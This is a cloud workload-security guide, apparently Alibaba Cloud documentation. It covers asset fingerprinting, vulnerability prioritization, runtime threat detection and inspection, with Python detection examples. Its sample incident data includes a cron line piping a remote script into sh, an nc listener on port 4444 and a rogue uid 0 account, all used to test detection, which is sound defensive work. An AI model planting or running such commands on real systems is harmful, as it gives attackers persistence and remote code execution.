Workload Security Protection

Updated at: 2023-09-25 06:57

Workloads in the cloud are the sets of related functions or atomic capabilities that support IT business systems, such as servers, VMs, containers, networks, and databases. VMs and containers are the most commonly used workload environments in the cloud. For VM and container protection, consider the following points:

  • Effectively identify workloads and understand the asset fingerprints in the cloud.

  • Identify and remediate vulnerabilities in workloads.

  • Establish runtime protection mechanisms to ensure the security of your workloads.

  • Develop a regular security inspection plan to ensure the security, effectiveness, and compliance of your workloads.

Identify and Review Asset Basic Security Information

Before implementing security protection measures, an enterprise needs to know which assets it owns in the cloud, together with their basic attributes and security status. Identifying and reviewing asset fingerprints gives up-to-date details of the assets and workloads in the cloud. The asset fingerprints that enterprises should usually pay attention to are the following:

  1. Server Basic Information
     Purpose: collects basic attributes of servers, such as region, access method, and security protection status.
     Security-related actions:
       - A public IP on a server means it is reachable from the Internet, which indicates a higher risk.
       - The basic information shows whether the server is covered by a security tool. For example, check whether the Alibaba Cloud Security Center agent is installed to determine whether the server can defend against attacks.

  2. Accounts
     Purpose: collects the privileged and regular user accounts on servers.
     Security-related actions: analyze and compare account information to identify and locate attacks during incident tracing, for example accounts that were added or given privileges around the time of an incident.

  3. Ports
     Purpose: collects the exposed ports and network protocols on servers, and the process associated with each port.
     Security-related actions: analyze and reduce the set of exposed ports, and analyze the protocols behind them, so that exposure can be managed and monitored centrally.

  4. Processes
     Purpose: collects the processes running on servers.
     Security-related actions: analyze the process path, start time, and startup parameters to spot malicious processes implanted as backdoors.

  5. Middleware
     Purpose: collects the application middleware deployed on servers.
     Security-related actions: when a high-risk middleware vulnerability or vulnerability alert is published, the number and distribution of deployed instances of that middleware immediately tells you the impact and the remediation priority.

  6. Scheduled Tasks
     Purpose: collects the commands and accounts of scheduled tasks.
     Security-related actions: in many attack incidents, attackers create scheduled tasks to keep their tools persistent; review new or changed tasks.

  7. Startup Items
     Purpose: collects the paths and servers associated with startup items.
     Security-related actions: analyzing startup items, another common persistence mechanism, helps trace and locate attack incidents.

Enterprises need to have methods and tools to automate the collection, storage, statistics, and analysis of basic asset information. This will help determine the severity of incidents, analyze attack processes, and identify the appropriate response measures.

Best Practices

Identifying and analyzing asset basic information and security information involves the following steps:

  1. Choose a method and frequency for collecting asset fingerprints. Automated collection is generally recommended, and agent-based collection is preferred over network scanning: an agent sees accounts, processes, scheduled tasks, and startup items that are invisible from the network.

  2. Classify the collected asset fingerprints and store them in categories according to the seven modules mentioned in the table above.

  3. When a security incident occurs, check the update status of asset fingerprints and analyze whether there are any suspicious user accounts, processes, scheduled tasks, or exposed ports before and after the security incident.

Alibaba Cloud provides security tools that help enterprises quickly identify and analyze the basic information and security information of their assets in the cloud. You can use Alibaba Cloud Security Center to automate the collection of asset fingerprints and visualize the results. The logs can be stored in Log Service (SLS), where they can be used for monitoring and alerting or as context during incident investigation.
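As an added example (not Alibaba Cloud's or Security Center's code), the following Python script shows the logic behind steps 2 and 3 above: it parses three of the seven fingerprint modules (accounts, ports, scheduled tasks) from the text an agent would read on a Linux host, stores them as a snapshot, and diffs a baseline snapshot against a post-incident one. The inputs are constructed sample text standing in for /etc/passwd, `ss -tlnp` output and /etc/crontab, and the severity rules in `triage` are assumptions; in production the snapshots would come from the agent and be kept in a log store such as SLS.

```python
"""Asset-fingerprint snapshot and diff (added example, not Alibaba Cloud code).
Parses three of the seven fingerprint modules (accounts, ports, scheduled tasks)
from the text an agent reads on a Linux host. All inputs are constructed samples."""
import re

SS_LISTEN = re.compile(r'^LISTEN\s+\d+\s+\d+\s+(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+'
                       r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+)')
LOOPBACK = ("127.", "[::1]")

def parse_passwd(text):
    """/etc/passwd text -> {name: {uid, shell}} for accounts with a login shell."""
    accounts = {}
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 7 or line.startswith("#") or parts[6].endswith(("nologin", "false")):
            continue  # comments and service accounts that cannot log in are skipped
        accounts[parts[0]] = {"uid": int(parts[2]), "shell": parts[6]}
    return accounts

def parse_listening(text):
    """`ss -tlnp` output -> {'addr:port': {proc, pid, exposed}}; non-loopback binds are exposed."""
    ports = {}
    for line in text.splitlines():
        m = SS_LISTEN.match(line.strip())
        if m:
            ports[f"{m['addr']}:{m['port']}"] = {"proc": m["proc"], "pid": int(m["pid"]),
                                                 "exposed": not m["addr"].startswith(LOOPBACK)}
    return ports

def parse_cron(text):
    """/etc/crontab or /etc/cron.d lines -> {'user:command': schedule}."""
    tasks = {}
    for line in text.splitlines():
        fields = line.split()
        if not fields or fields[0].startswith("#") or "=" in fields[0]:
            continue  # blank line, comment, or environment assignment
        n = 1 if fields[0].startswith("@") else 5  # '@reboot' style vs five-field schedule
        if len(fields) >= n + 2:
            tasks[f"{fields[n]}:{' '.join(fields[n + 1:])}"] = " ".join(fields[:n])
    return tasks

def snapshot(passwd_text, ss_text, cron_text):
    """One fingerprint snapshot; in production it would be stored per host and timestamp."""
    return {"accounts": parse_passwd(passwd_text), "ports": parse_listening(ss_text),
            "scheduled_tasks": parse_cron(cron_text)}

def diff_snapshots(before, after):
    """Per category: keys only in `after` (added) and only in `before` (removed)."""
    return {cat: {"added": sorted(set(after[cat]) - set(before[cat])),
                  "removed": sorted(set(before[cat]) - set(after[cat]))} for cat in before}

def triage(before, after):
    """Findings a responder acts on first; the severity rules are assumptions."""
    d, findings = diff_snapshots(before, after), []
    for name in d["accounts"]["added"]:
        acct = after["accounts"][name]
        sev = "high" if acct["uid"] == 0 else "medium"  # a second uid 0 account is a classic backdoor
        findings.append((sev, f"new login account {name} (uid {acct['uid']}, {acct['shell']})"))
    for key in d["ports"]["added"]:
        p = after["ports"][key]
        if p["exposed"]:
            findings.append(("high", f"new exposed listener {key} by {p['proc']} (pid {p['pid']})"))
    for key in d["scheduled_tasks"]["added"]:
        findings.append(("high", f"new scheduled task {key} [{after['scheduled_tasks'][key]}]"))
    return sorted(findings, key=lambda f: {"high": 0, "medium": 1}[f[0]])

# Constructed sample data: a baseline and a post-incident collection from one host.
PASSWD_BEFORE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
deploy:x:1000:1000::/home/deploy:/bin/bash
"""
PASSWD_AFTER = PASSWD_BEFORE + "backup:x:0:0::/root:/bin/bash\n"
SS_BEFORE = """State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0      128    0.0.0.0:22        0.0.0.0:*   users:(("sshd",pid=812,fd=3))
LISTEN 0      511    127.0.0.1:6379    0.0.0.0:*   users:(("redis-server",pid=1203,fd=6))
"""
SS_AFTER = SS_BEFORE + 'LISTEN 0      10     0.0.0.0:4444      0.0.0.0:*   users:(("nc",pid=2310,fd=3))\n'
CRON_BEFORE = """SHELL=/bin/sh
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
"""
CRON_AFTER = CRON_BEFORE + "*/5 * * * * root curl -s http://198.51.100.7/a.sh | sh\n"

if __name__ == "__main__":
    baseline = snapshot(PASSWD_BEFORE, SS_BEFORE, CRON_BEFORE)
    incident = snapshot(PASSWD_AFTER, SS_AFTER, CRON_AFTER)
    for sev, msg in triage(baseline, incident):
        print(f"[{sev}] {msg}")
```

Run as a script, the constructed post-incident snapshot yields three high findings: a second uid 0 account, a new listener on 0.0.0.0:4444, and a cron job that pipes a remote script into sh, which are exactly the account, port, and scheduled-task changes that step 3 tells you to look for. Keying ports by address as well as number matters: a service that was bound to 127.0.0.1 and is later re-bound to 0.0.0.0 shows up as a new exposed listener rather than disappearing into an unchanged port number.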

Vulnerability Management

Vulnerabilities are among the weaknesses most often exploited in network attacks. Vulnerability management covers identifying vulnerabilities, assessing their severity, prioritizing and applying fixes, and scanning continuously. Implemented in the cloud, it reduces the number of exploitable weaknesses on servers, reduces their exposure, and improves overall security. Enterprises need a comprehensive vulnerability management plan that includes the scanning plan, assessment criteria, remediation process, management responsibilities, and emergency response plan. The following are recommendations for each item:

Vulnerability Scanning Plan

  1. Define the scope of cloud vulnerability scanning, which usually includes operating system vulnerabilities, application vulnerabilities, container image vulnerabilities, and code vulnerabilities.

  2. Scan for operating system and application vulnerabilities regularly, at a frequency set by business importance and internal requirements.

  3. Scan container images before deployment. Fix high-risk images before they are deployed and released.

  4. Use static code analysis to check application source code for common issues.

  5. Consider regularly hiring external experts to conduct penetration tests against core systems.

Vulnerability Assessment Criteria

  1. Evaluate the impact of a vulnerability in the current system environment along dimensions such as disclosure time, exploitability, and the importance of the affected assets.

  2. Alibaba Cloud provides a vulnerability scoring system that evaluates the risk of vulnerabilities in real environments and can serve as a reference for enterprise assessments. Refer to Alibaba Cloud Vulnerability Scoring System.

Vulnerability Remediation Process

Remediation needs to consider the impact on the business and the maintenance windows of the workloads.

Vulnerability Management Responsibilities

In general, the security team monitors and assesses vulnerability risk, impact, and severity, and notifies the business team, which is responsible for fixing the vulnerabilities.

Vulnerability Emergency Response Plan

For high-risk or 0-day vulnerabilities, have an emergency response plan. A quick response is needed before official fix recommendations and guidance are released, so the plan should define temporary mitigations that can be applied in the meantime.

Enterprises should fully understand the shared responsibility model for cloud security. In this model, Alibaba Cloud is responsible for protecting the security of the cloud platform and maintaining the vulnerabilities in the cloud platform. Enterprises are responsible for the vulnerabilities in their self-built workloads.

Best Practices

For both ECS and container deployments, attention should be paid to image security, especially in large-scale deployments where an enterprise has many member accounts. Two pain points are common in such environments: each business unit builds images under its own member account without a unified security baseline, which introduces business risk, and images are hard to distribute consistently across multiple regions and accounts. Alibaba Cloud recommends the Golden Image solution: build images in a dedicated shared-services account for centralized control, which prevents workload accounts from using non-compliant images, and use the resource directory and automation capabilities to distribute images to all workload accounts at once.

For image security, Alibaba Cloud suggests using Security Center to scan images regularly and to manage the workload runtime environment centrally. Security Center provides the following vulnerability management capabilities for workloads:

  1. Use Alibaba Cloud Security Center to automatically identify servers and assets in the cloud. To achieve this, configure a vulnerability scanning task for automated identification and detection of vulnerabilities.

  2. Check the risk level indications provided by Security Center for vulnerabilities. Security Center provides comprehensive vulnerability scores and priorities based on vulnerability risk level, exploitability, and disclosure time.

  3. For operating system vulnerabilities, use Security Center to perform one-click fixes, and view fix precautions before applying patches. You can also create snapshots of operating systems as backups for rollback purposes.

  4. For application vulnerabilities, use Security Center to view fix recommendations, vulnerability details, and affected scope. Security Center does not provide one-click fixes for application vulnerabilities.

  5. For container image vulnerabilities, use Security Center to check vulnerabilities and weaknesses in container images.

  6. For emergency vulnerabilities, use Security Center to conduct a quick self-check. Emergency vulnerabilities are the high-risk and 0-day vulnerabilities published by the Alibaba Cloud Security Team. Security Center detects whether servers are affected by them, and it can be linked with the firewall's virtual patching feature for quick defense, providing both proactive prevention and emergency response.

  7. Use Security Center to design vulnerability remediation plans and automate vulnerability remediation for specific types, levels, and groups of servers. For more information, refer to the Security Center playbook feature.
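The assessment criteria above (disclosure time, exploitability, asset importance), the middleware fingerprint from the previous section, and the rule that images with high-risk findings are fixed before release can be combined into one prioritization routine. The following Python is an added example of that logic and is not Alibaba Cloud's vulnerability scoring system or Security Center's code: the weights, deadlines and gate policy are illustrative assumptions, and the findings and assets are constructed samples with placeholder identifiers.

```python
"""Environment-aware vulnerability prioritization and a pre-release image gate.
Added example, not Alibaba Cloud's vulnerability scoring system; weights and
deadlines are illustrative assumptions, and the findings below are constructed."""
from dataclasses import dataclass
from datetime import date, timedelta

@dataclass(frozen=True)
class Finding:
    vuln_id: str          # scanner identifier (placeholder values below)
    severity: str         # critical / high / medium / low as reported by the scanner
    exploit_public: bool  # public exploit or in-the-wild exploitation is known
    disclosed: date       # public disclosure date
    fix_available: bool   # a patched package or image layer exists
    component: str        # affected package or middleware

@dataclass(frozen=True)
class Asset:
    name: str
    importance: int        # 1 test, 2 internal, 3 core business system
    public_ip: bool        # reachable from the Internet
    middleware: frozenset  # middleware fingerprint collected from the host

SEVERITY_BASE = {"critical": 9.0, "high": 7.0, "medium": 4.0, "low": 1.0}
IMPORTANCE_WEIGHT = {1: 0.6, 2: 0.85, 3: 1.0}

def score(f, asset, today):
    """Risk on a 0..10 scale from the assessment dimensions: severity, exploitability,
    disclosure age, asset importance, plus exposure (public IP). Weights are assumed."""
    s = SEVERITY_BASE.get(f.severity.lower(), 1.0)
    if f.exploit_public:
        s += 2.0
    if (today - f.disclosed).days <= 14:
        s += 1.0  # fresh disclosures: mass exploitation usually follows within days
    s *= IMPORTANCE_WEIGHT[asset.importance]
    if asset.public_ip:
        s += 1.0
    return min(round(s, 1), 10.0)

def deadline(risk, today):
    """Remediation window by score (assumed policy)."""
    days = 1 if risk >= 9.0 else 7 if risk >= 7.0 else 30 if risk >= 4.0 else 90
    return today + timedelta(days=days)

def prioritize(findings, asset, today):
    """Findings whose component is actually deployed on the asset, highest risk first."""
    rows = []
    for f in findings:
        if f.component not in asset.middleware:
            continue  # the middleware fingerprint says the vulnerable component is absent
        r = score(f, asset, today)
        rows.append({"vuln": f.vuln_id, "score": r, "due": deadline(r, today),
                     "action": "patch" if f.fix_available else "mitigate (virtual patch / access restriction)"})
    return sorted(rows, key=lambda r: -r["score"])

def image_gate(findings):
    """Release gate for a container image (assumed policy): block on any fixable
    critical/high finding or any finding with a public exploit."""
    blockers = sorted(f.vuln_id for f in findings
                      if (f.severity.lower() in ("critical", "high") and f.fix_available)
                      or f.exploit_public)
    return (not blockers, blockers)

TODAY = date(2023, 9, 25)
FINDINGS = [  # constructed sample scanner output; identifiers are placeholders
    Finding("SAMPLE-001", "critical", True, date(2023, 9, 22), False, "tomcat"),
    Finding("SAMPLE-002", "high", False, date(2023, 6, 1), True, "openssl"),
    Finding("SAMPLE-003", "medium", False, date(2023, 8, 1), True, "postgresql"),
    Finding("SAMPLE-004", "low", False, date(2023, 1, 10), True, "openssl"),
]
CORE_WEB = Asset("web-01", 3, True, frozenset({"tomcat", "openssl"}))

if __name__ == "__main__":
    for row in prioritize(FINDINGS, CORE_WEB, TODAY):
        print(row)
    print("image release allowed:", image_gate(FINDINGS))
```

Two points the code makes that the table only states: the same finding gets a different score and deadline on a public-facing core system than on an isolated test box, and a finding with a public exploit but no available fix is routed to mitigation (the virtual patching path described in item 6) rather than waiting for a patch that does not exist yet.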

Runtime Protection

Runtime protection covers servers, container environments, and similar workloads by deploying security agents inside them. It provides threat detection, threat analysis, and threat response. Enterprises should understand the threats that workloads face at runtime and apply the corresponding protection measures.

  1. Virus and Trojan Horses
     Trojans are programs specifically designed to infiltrate servers. They usually masquerade as system programs and then download and release other malicious programs.

  2. Ransomware
     Malware that encrypts and locks the critical data files on a server in order to demand a ransom.

  3. Malicious Tampering
     A process attempts to move or modify system files to evade monitoring by security software. This usually indicates an attacker trying to bypass monitoring during an intrusion.

  4. Backdoor
     Suspicious WebShell files, which attackers implant after compromising a website in order to keep their access and privileges.

  5. Abnormal Login
     Two logins to a server within a short period from geographically distant locations, one of them a location the account frequently uses. The login appears to have moved from a common location to an abnormal one in a time that makes physical travel implausible.

  6. Brute-force Attacks
     A single IP attempts to log in to a server with many invalid usernames or passwords and eventually succeeds.

  7. Communication Activities with Mining Pools
     Traffic to mining pool IP addresses, which indicates that the server may have been compromised and is being used for cryptomining.

  8. Lateral Movement within the Internal Network
     Abnormal internal network connections, which may indicate an attacker moving between servers after compromising one of them.

  9. Execution of Malicious Code Scripts
     Execution of malicious Bash, PowerShell, Python, or other scripts on the server.

  10. Worm Virus
      Programs that attack other servers from a compromised server, typically by exploiting vulnerabilities and cracking passwords, so that the infection spreads on its own.

  11. Suspicious Privileged Containers
      A privileged container that starts up can compromise the security of the container runtime environment. Once it is breached, it can affect other containers and assets on the host server.

Best Practices

Alibaba Cloud Security Center is a native workload protection component on the cloud. Refer to Security Center. For ECS instances created with security hardening enabled (the default option), the Security Center agent is installed automatically. Security Center provides runtime protection for workloads.

  1. Enable runtime protection: enable runtime protection in Security Center. Security hardening must be enabled when the ECS instance is created so that the Security Center agent is deployed automatically; then enable the Security Center functions that match your protection requirements.

  2. Enable virus detection: Configure virus detection scan policies, choose to scan specific business systems-related servers or all servers, and set the scan plan. Refer to virus detection.

  3. Enable anti-ransomware protection: configure anti-ransomware protection, which protects your servers against ransomware attacks by combining decoy folders, which reveal encryption activity early, with backups of important data for recovery. Refer to Anti-ransomware protection.

  4. Enable host protection: Configure host protection rules for identifying and blocking abnormal behaviors on hosts, e.g., rules for preventing brute-force attacks and rules for custom process alerts. Refer to host-specific rule management.

  5. Enable container protection: Configure container proactive defense rules, such as prohibiting the startup of images that have not passed security detection, and configuring container file defenses, etc. Refer to Use the feature of proactive defense for containers.

  6. View events and alerts: Use Security Center to view runtime alerts. Alibaba Cloud Security Center classifies alerts according to ATT&CK attack phases, which provides a more intuitive display of attack paths, attack processes, and attack details. Refer to Events.
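To make rows 5 and 6 of the threat table concrete, the following Python is an added example of the detection logic a host agent applies to login events; it is not Security Center's detection code. It parses constructed sshd log lines, raises a brute-force alert when one IP accumulates failures inside a sliding window and then logs in successfully, and raises a location alert when an account logs in from a region it has never used (a simplification of the impossible-travel check; the IP-to-region table stands in for a GeoIP lookup and the baseline of usual regions is constructed).

```python
"""Detection logic for two runtime threats from the table above: brute-force logins that
end in success, and logins from an unusual location. Added example, not Security Center's
detection code; input is constructed sshd log text and a stand-in GeoIP table."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOG_RE = re.compile(r'^(?P<ts>\w{3}\s+\d+\s[\d:]{8})\s\S+\ssshd\[\d+\]:\s'
                    r'(?P<result>Accepted|Failed)\s\S+\sfor\s(?:invalid user\s)?'
                    r'(?P<user>\S+)\sfrom\s(?P<ip>\S+)')

def parse_auth_log(text, year=2023):
    """sshd syslog lines -> login events; syslog has no year, so it is supplied."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append({"ts": ts, "ok": m["result"] == "Accepted",
                           "user": m["user"], "ip": m["ip"]})
    return events

def detect_bruteforce(events, threshold=5, window=timedelta(minutes=10)):
    """Alert when one IP accumulates `threshold` failures inside `window` and then succeeds."""
    failures, alerts = defaultdict(deque), []
    for e in events:
        q = failures[e["ip"]]
        while q and e["ts"] - q[0] > window:
            q.popleft()  # drop failures older than the sliding window
        if not e["ok"]:
            q.append(e["ts"])
        elif len(q) >= threshold:
            alerts.append({"type": "brute_force_success", "ip": e["ip"], "user": e["user"],
                           "failures": len(q), "ts": e["ts"]})
            q.clear()
    return alerts

def detect_unusual_location(events, geo, usual):
    """Alert on a successful login from a region the account has not logged in from before;
    a simplification of the impossible-travel check in the table."""
    seen = {user: set(regions) for user, regions in usual.items()}
    alerts = []
    for e in events:
        if not e["ok"]:
            continue
        region = geo.get(e["ip"], "unknown")
        known = seen.setdefault(e["user"], set())
        if region not in known:
            alerts.append({"type": "unusual_login_location", "user": e["user"],
                           "ip": e["ip"], "region": region, "ts": e["ts"]})
            known.add(region)  # one alert per new region, not per login
    return alerts

# Constructed sample log: a normal key login, a password-spray that succeeds, one stray failure.
AUTH_LOG = """\
Sep 25 06:50:01 web-01 sshd[812]: Accepted publickey for deploy from 198.51.100.20 port 40001 ssh2
Sep 25 06:55:10 web-01 sshd[901]: Failed password for invalid user admin from 203.0.113.9 port 51001 ssh2
Sep 25 06:55:12 web-01 sshd[902]: Failed password for invalid user test from 203.0.113.9 port 51002 ssh2
Sep 25 06:55:14 web-01 sshd[903]: Failed password for invalid user oracle from 203.0.113.9 port 51003 ssh2
Sep 25 06:55:16 web-01 sshd[904]: Failed password for root from 203.0.113.9 port 51004 ssh2
Sep 25 06:55:18 web-01 sshd[905]: Failed password for root from 203.0.113.9 port 51005 ssh2
Sep 25 06:55:20 web-01 sshd[906]: Failed password for root from 203.0.113.9 port 51006 ssh2
Sep 25 06:57:02 web-01 sshd[910]: Accepted password for root from 203.0.113.9 port 51100 ssh2
Sep 25 07:10:00 web-01 sshd[950]: Failed password for deploy from 198.51.100.20 port 40002 ssh2
"""
GEO = {"198.51.100.20": "cn-hangzhou", "203.0.113.9": "eu-west-1"}  # stand-in for GeoIP
USUAL = {"deploy": {"cn-hangzhou"}, "root": set()}  # baseline built from prior login history

if __name__ == "__main__":
    events = parse_auth_log(AUTH_LOG)
    for alert in detect_bruteforce(events) + detect_unusual_location(events, GEO, USUAL):
        print(alert)
```

The sliding window is what separates a brute-force alert from noise: the single failed login by `deploy` at 07:10 never reaches the threshold, while the six failures from 203.0.113.9 followed by an accepted root password two minutes later produce one alert with the failure count attached. The same root login also trips the location check, because root has no baseline region; in practice such an event is where the asset fingerprint diff from the first section gets run.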

Regular Security Inspection

Security is a dynamic and continuous process. Enterprises should conduct regular security inspections of their workloads and develop inspection and monitoring strategies.

  1. Inspection plan: Create an inspection plan based on the importance of business systems and the risk exposure level, customize inspection cycles, and assign responsibilities.

  2. Inspection contents: define what is inspected, for example the online status of runtime protection agents. The contents should cover workload security status, vulnerability status, vulnerability remediation status, and security incident handling status.

  3. Automation: use automated methods for the regular inspection of workloads, and define security monitoring metrics so that security staff can extract the information that matters from a large volume of security alerts.
